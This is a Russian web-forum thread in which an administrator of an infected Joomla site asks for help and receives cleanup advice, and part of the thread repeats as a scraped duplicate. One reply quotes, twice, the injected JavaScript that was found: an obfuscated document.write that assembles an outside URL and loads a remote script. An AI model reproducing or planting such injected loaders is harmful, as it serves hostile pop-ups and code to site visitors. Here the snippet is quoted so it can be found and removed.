На моём сайте вирус, где и как его искать ?

@Trader · Регистрация: 23.08.2010

Author24 — интернет-сервис помощи студентам

Я почти отчаялся найти вирус на сайте который мне довелось принять на администрирование...
Сайт на Joomla, при выходе на первую страницу браузеры иногда, и не все ругаются что она заразная...
Хотя реально она не чем не заражает, а вот при попытке навигации по меню, всплывает окошко (порнуха), притом только раз в сутки на одном браузере, потом всё нормально...
Пробовал искать ссылки в js скриптах - не помогло, скорее всего они не прямые, всплывающих окошка два, вылезают по-очереди (порнуха и выйграть три лимона)...Переписать сайт такого масштаба я пока не компетентен, да и с хозяином сайта всё на общественных началах, то бишь почти бесплатно.
Огромная просьба, помогите советом, где, что и чем мне искать, заранее благодарен

Vovan-VE · 23.08.2010, 08:28

У Вас там есть

Javascript

1	document.write("<a href='http://superstat.ru/...

А в нем там

Javascript

1
2

Sa381='http://jen'+'ik'+'.'+'o'+'koshechk'+'a.net/s/cYdGbsO8264/?sid=26179';
document.write("<sc"+"ript la"+"ngua"+"ge='ja"+"vascr"+"ipt' t"+"ype='t"+"ext/jav"+"asc"+"ript' sr"+"c='"+Sa381+"'></scr"+"ipt>");

И там аналогично еще парочка.

Снесите нафиг этот supеrstаt.ru

@ValeryB · 23.08.2010, 08:58

1. Проверить свой комп на вирусы. Поменять пароли на FTP доступ к сайту.
2. Сделать бекап сайта. Развернуть на локальной машине.
3. Проверить антивирусником (Касперским).
4. Перезалить поверху чистой Joomla такой-же версии, без папки installation и configuration.php.
5. Перезалить поверху пакетом обновления на последнюю версию http://joomlacode.org/gf/proje... tion=index.
6. Сделать на локалке чистую установку последней версии Joomla и установить те же расширения, что на сайте. Потом все папки расширений скопировать поверх соответствующих папок сайта. Возможно потребуется сделать в админке сайта некоторые настройки заново.

Если не помогло:
1. Сделать поиск в Инете по всем установленным расширениям с ключевыми словам "вирус" + "уязвимость" + имя расширения. Если обнаружено, проверять по ним.
2. Если вирус все еще присутствует, тотальный поиск по содержимому файлов сайта на локалке с использованием характерных слов в Dreamweaver или Тотал Коммандере.
3. Далее, только ручная проверка по файлам расширений. При этом в редакторе включить перенос длинных строк, т.к. часто прописывается в одну строку со сдвигом вправо за пределы экрана.

Vovan-VE · 23.08.2010, 09:00

Сообщение от ValeryB

тотальный поиск по содержимому файлов сайта на локалке с использованием характерных слов в Dreamweaver или Тотал Коммандере.

Неэффективно. Оно же не вчера родилось:

Javascript

1
2

Sa381='http://jen'+'ik'+'.'+'o'+'koshechk'+'a.net/s/cYdGbsO8264/?sid=26179';
document.write("<sc"+"ript la"+"ngua"+"ge='ja"+"vascr"+"ipt' t"+"ype='t"+"ext/jav"+"asc"+"ript' sr"+"c='"+Sa381+"'></scr"+"ipt>");

@ValeryB · 23.08.2010, 09:07

Если все прошло успешно, то меняем сайт на хостинге на обновленный и через htaccess закрывается доступ для посторонних на не нужные им папки.

@Trader · 23.08.2010, 09:49 **[ТС]**

Всем огромное спасибо, особенно Vovan-VE, Ваш совет очень помог !!!
Единственное что яндекс при поиске в нём сайта по русскому названию говорит что он заражён, они сами разберутся или им писать прошение надо ?

Vovan-VE · 23.08.2010, 10:05

Сообщение от Trader

Единственное что яндекс при поиске в нём сайта по русскому названию говорит что он заражён

Подождите, пока он переиндексируется.

@Trader · 29.08.2010, 18:06 **[ТС]**

Yandex соблаговолил проиндексировать мой сайт, о чём прислал мне два письма, первое о том что у меня всё хорошо на сайте, а второе через пол-часа - что у меня вредоносный код .....И как его понимать ?
Процедура поиска вредоносного кода описанная и предложенная Yandex , повергла меня в тихий ужос...
Вопрос первый господа: верить ли yandex, а второй если да, то что можно сделать акромя того что всё убить и писать по-новой ?

@Pasha1345 · 11.04.2018, 09:00

Да, непростая ситуация у вас. Конечно все убивать и переписывать код по новой не лучший вариант! Yandex тем более прислал вам два письма! Возможно одно из установленных расширений планирует изменение кода как задачу, по определенному времени? Если вам кажется какое либо расширение подозрительным, стоит попробовать удалить его с сайта, посмотрите здесь, может поможет https://www.kill-virus.ru Просто вы можете написать по новой, но это не принесет результата если опять будут установлены те-же расширения.

@Trader 1 / 1 / 0 Регистрация: 23.08.2010 Сообщений: 12
		1
	На моём сайте вирус, где и как его искать ? 23.08.2010, 07:56. Показов 1796. Ответов 8 Метки нет (Все метки) Я почти отчаялся найти вирус на сайте который мне довелось принять на администрирование... Сайт на Joomla, при выходе на первую страницу браузеры иногда, и не все ругаются что она заразная... Хотя реально она не чем не заражает, а вот при попытке навигации по меню, всплывает окошко (порнуха), притом только раз в сутки на одном браузере, потом всё нормально... Пробовал искать ссылки в js скриптах - не помогло, скорее всего они не прямые, всплывающих окошка два, вылезают по-очереди (порнуха и выйграть три лимона)...Переписать сайт такого масштаба я пока не компетентен, да и с хозяином сайта всё на общественных началах, то бишь почти бесплатно. Огромная просьба, помогите советом, где, что и чем мне искать, заранее благодарен 0

@ValeryB 633 / 376 / 7 Регистрация: 25.05.2010 Сообщений: 1,372
	23.08.2010, 08:58	3
	1. Проверить свой комп на вирусы. Поменять пароли на FTP доступ к сайту. 2. Сделать бекап сайта. Развернуть на локальной машине. 3. Проверить антивирусником (Касперским). 4. Перезалить поверху чистой Joomla такой-же версии, без папки installation и configuration.php. 5. Перезалить поверху пакетом обновления на последнюю версию http://joomlacode.org/gf/proje... tion=index. 6. Сделать на локалке чистую установку последней версии Joomla и установить те же расширения, что на сайте. Потом все папки расширений скопировать поверх соответствующих папок сайта. Возможно потребуется сделать в админке сайта некоторые настройки заново. Если не помогло: 1. Сделать поиск в Инете по всем установленным расширениям с ключевыми словам "вирус" + "уязвимость" + имя расширения. Если обнаружено, проверять по ним. 2. Если вирус все еще присутствует, тотальный поиск по содержимому файлов сайта на локалке с использованием характерных слов в Dreamweaver или Тотал Коммандере. 3. Далее, только ручная проверка по файлам расширений. При этом в редакторе включить перенос длинных строк, т.к. часто прописывается в одну строку со сдвигом вправо за пределы экрана. 1

@ValeryB 633 / 376 / 7 Регистрация: 25.05.2010 Сообщений: 1,372
	23.08.2010, 09:07	5
	Если все прошло успешно, то меняем сайт на хостинге на обновленный и через htaccess закрывается доступ для посторонних на не нужные им папки. 1

@Trader 1 / 1 / 0 Регистрация: 23.08.2010 Сообщений: 12
	23.08.2010, 09:49 [ТС]	6
	Всем огромное спасибо, особенно Vovan-VE, Ваш совет очень помог !!! Единственное что яндекс при поиске в нём сайта по русскому названию говорит что он заражён, они сами разберутся или им писать прошение надо ? 0

Vovan-VE 13208 / 6597 / 1041 Регистрация: 10.01.2008 Сообщений: 15,069
	23.08.2010, 10:05	7
	Сообщение от Trader Единственное что яндекс при поиске в нём сайта по русскому названию говорит что он заражён Подождите, пока он переиндексируется. 1

@Trader 1 / 1 / 0 Регистрация: 23.08.2010 Сообщений: 12
	29.08.2010, 18:06 [ТС]	8
	Yandex соблаговолил проиндексировать мой сайт, о чём прислал мне два письма, первое о том что у меня всё хорошо на сайте, а второе через пол-часа - что у меня вредоносный код .....И как его понимать ? Процедура поиска вредоносного кода описанная и предложенная Yandex , повергла меня в тихий ужос... Вопрос первый господа: верить ли yandex, а второй если да, то что можно сделать акромя того что всё убить и писать по-новой ? 0

@Pasha1345 0 / 0 / 0 Регистрация: 11.04.2018 Сообщений: 4
	11.04.2018, 09:00	9
	Да, непростая ситуация у вас. Конечно все убивать и переписывать код по новой не лучший вариант! Yandex тем более прислал вам два письма! Возможно одно из установленных расширений планирует изменение кода как задачу, по определенному времени? Если вам кажется какое либо расширение подозрительным, стоит попробовать удалить его с сайта, посмотрите здесь, может поможет https://www.kill-virus.ru Просто вы можете написать по новой, но это не принесет результата если опять будут установлены те-же расширения. 0